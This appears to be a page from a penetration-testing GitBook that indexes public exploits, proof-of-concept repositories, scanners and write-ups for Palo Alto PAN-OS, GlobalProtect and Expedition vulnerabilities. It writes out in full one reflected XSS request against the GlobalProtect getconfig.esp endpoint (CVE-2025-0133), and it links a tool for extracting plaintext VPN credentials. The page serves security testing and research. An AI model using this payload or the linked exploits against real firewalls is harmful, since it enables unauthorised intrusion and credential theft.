search

Palo Alto

Palo Alto Exploits

ko-fiarrow-up-right

hashtag
CVE-2025-0133 - XSS

/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer

Nuclei Template:

LogoPAN-OS - Reflected Cross-Site ScriptingAI-Powered Template Generation and Scanningchevron-right

hashtag
CVE-2025-0110 - PAN-OS Command Injection

LogoGitHub - openconfig/gnmic: gNMIc is a gNMI CLI client and collectorGitHubchevron-right
LogoPaloAlto OpenConfig Plugin: Command Injection VulnerabilityGitHubchevron-right
LogoGoogle Releases PoC for CVE-2025-0110 Command Injection in PAN-OS FirewallsDaily CyberSecuritychevron-right

hashtag
CVE-2025-0108 - Authentication Bypass

LogoGitHub - fr4nc1stein/CVE-2025-0108-SCAN: Detects an authentication bypass vulnerability in Palo Alto PAN-OS (CVE-2025-0108).GitHubchevron-right
https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/slcyber.iochevron-right
LogoGitHub - iSee857/CVE-2025-0108-PoC: Palo Alto Networks PAN-OS 身份验证绕过漏洞批量检测脚本(CVE-2025-0108)GitHubchevron-right
LogoGitHub - FOLKS-iwd/CVE-2025-0108-PoC: This repository contains a Proof of Concept (PoC) for the **CVE-2025-0108** vulnerability, which is an **authentication bypass** issue in Palo Alto Networks' PAN-OS software. The scripts provided here test for the vulnerability by sending a crafted HTTP request to the target systems.GitHubchevron-right

hashtag
CVE-2024-3400 Palo Alto File Write Exploit

LogoGitHub - ak1t4/CVE-2024-3400: Global Protec Palo Alto File Write ExploitGitHubchevron-right
LogoGitHub - ihebski/CVE-2024-3400: CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtectGitHubchevron-right
LogoGitHub - h4x0r-dz/CVE-2024-3400: CVE-2024-3400 Palo Alto OS Command InjectionGitHubchevron-right

hashtag
PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474

LogoExploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474) by sfewer-r7 · Pull Request #19663 · rapid7/metasploit-frameworkGitHubchevron-right
LogoPots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474watchTowr Labschevron-right
LogoGitHub - watchtowrlabs/palo-alto-panos-cve-2024-0012GitHubchevron-right

hashtag
Palo Alto Global Protect

LogoGitHub - t3hbb/PanGP_Extractor: Tool to extract username and password of current user from PanGPA in plaintextGitHubchevron-right
LogoExtracting Plaintext Credentials from Palo Alto Global Protect - Shells.SystemsShells.Systemschevron-right

hashtag
Palo Alto Networks Expedition

hashtag
CVE-2024-5910 - Remotely reset the Expedition application admin credentials

LogoPalo Alto Expedition: From N-Day to Full CompromiseHorizon3.aichevron-right

hashtag
CVE-2024-9463 - RCE unauthenticated

Ref: https://x.com/watchtowrcyber/status/1844306954245767623?t=ibt0GSdt3qTVwHw54pdM1A&s=03arrow-up-right

hashtag
CVE-2024-9464 - Authenticated command injection vulnerability

LogoGitHub - horizon3ai/CVE-2024-9464: Proof of Concept Exploit for CVE-2024-9464GitHubchevron-right

hashtag
CVE-2024-9465 - Unauthenticated SQL Injection

LogoGitHub - horizon3ai/CVE-2024-9465: Proof of Concept Exploit for CVE-2024-9465GitHubchevron-right

hashtag
Interesting Books

Interesting Bookschevron-right
circle-info

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

hashtag
Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

ko-fiarrow-up-right

buymeacoffeearrow-up-right

PreviousOracle WeblogicNextPandora

Last updated